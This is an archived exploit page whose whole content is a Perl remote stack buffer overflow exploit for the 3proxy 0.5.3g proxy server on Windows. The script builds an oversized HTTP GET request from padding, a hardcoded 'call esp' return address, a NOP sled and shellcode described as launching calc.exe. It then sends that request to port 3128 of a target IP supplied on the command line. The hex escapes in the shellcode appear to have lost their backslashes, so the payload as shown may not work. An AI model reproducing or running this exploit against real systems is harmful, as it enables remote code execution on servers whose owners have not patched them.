3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)
# Published : 2007-12-18
# Author : Marcin Kozlowski
# Previous Title : RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit
# Next Title : iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit

#!/usr/bin/perl
#This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before 20070413. By sending a long host header in HTTP GET request to the default port of # 3128, a remote attacker could overflow a buffer and execute arbitrary code.
#                         
# Marcin Kozlowski based on vade79 PoC
#



#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our nopsled
$nopsled = "x90"x36;
$A = "A" x 1064;
$B = "B" x 999;



#execute calc.exe
#
$payload = 

"x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02".
"xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48".
"x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4".
"xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12".
"x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69".
"x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6".
"x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5".
"x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21".
"x61xddx0ex4d";


#our extended instruction pointer which we use to overwrite the remote eip
#remeber to make it little-endian format

$eip = "x72x93xabx71"; #call esp


#we construct our full attackstring here
$attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0nHost: ".$B."nn";


print $attackstring;

#view a message if no ip address is given
if(!$ip)
{

die "You have to provide the target's IP Address..n";

}

#the remote port to connect to
$port = '3128';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                                PeerPort=>$port,
                                Proto=>$protocol,
                                Timeout=>'1') || die "Could not create socketn";


#send the payload to the remote computer
print $socket $attackstring;

#close the connection
close($socket);

# www.Syue.com [2007-12-18]